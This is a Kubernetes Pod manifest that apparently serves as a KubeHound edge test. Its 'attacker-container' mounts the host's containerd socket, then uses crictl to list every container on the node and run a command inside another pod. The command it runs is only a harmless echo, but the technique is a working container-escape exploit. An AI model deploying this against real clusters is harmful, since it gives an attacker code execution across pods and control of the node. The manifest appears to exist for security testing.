apiVersion: v1
kind: Pod
metadata:
  name: kh-exploit-containerd-sock
  labels:
    app: kubehound-edge-test  # Or a dedicated label
spec:
  containers:
    - name: attacker-container
      image: k8sstormcenter/lightening-exploit-containerd-sock:latest
      volumeMounts:
        - name: containerd-sock
          mountPath: /host/run/containerd
          readOnly: true  
      command: ["/bin/sh", "-c"]
      args:
      - |
        MOUNTED_SOCK_PATH=$(find /host/run -name dockershim.sock -o -name containerd.sock -o -name crio.sock -o -name cri-dockerd.sock 2>/dev/null | head -n 1)
        if [[ -z "$MOUNTED_SOCK_PATH" ]]; then
            echo "No relevant sockets found. Exiting."
            exit 1
        fi
        cat <<EOF > /tmp/crictl.yaml
        runtime-endpoint: unix://$MOUNTED_SOCK_PATH
        image-endpoint: unix://$MOUNTED_SOCK_PATH
        debug: false
        EOF
        cc="/usr/local/bin/crictl --config /tmp/crictl.yaml"
        echo "Listing all pods:"
        $cc ps -a
        TARGET_POD_ID=$($cc ps -a | awk 'NR==2{print $1}')
        $cc exec -s $TARGET_POD_ID -- /bin/sh -c "echo 'Hello from the target pod!'"
        sleep infinity  


  volumes:
    - name: containerd-sock
      hostPath:
        path: /run/containerd



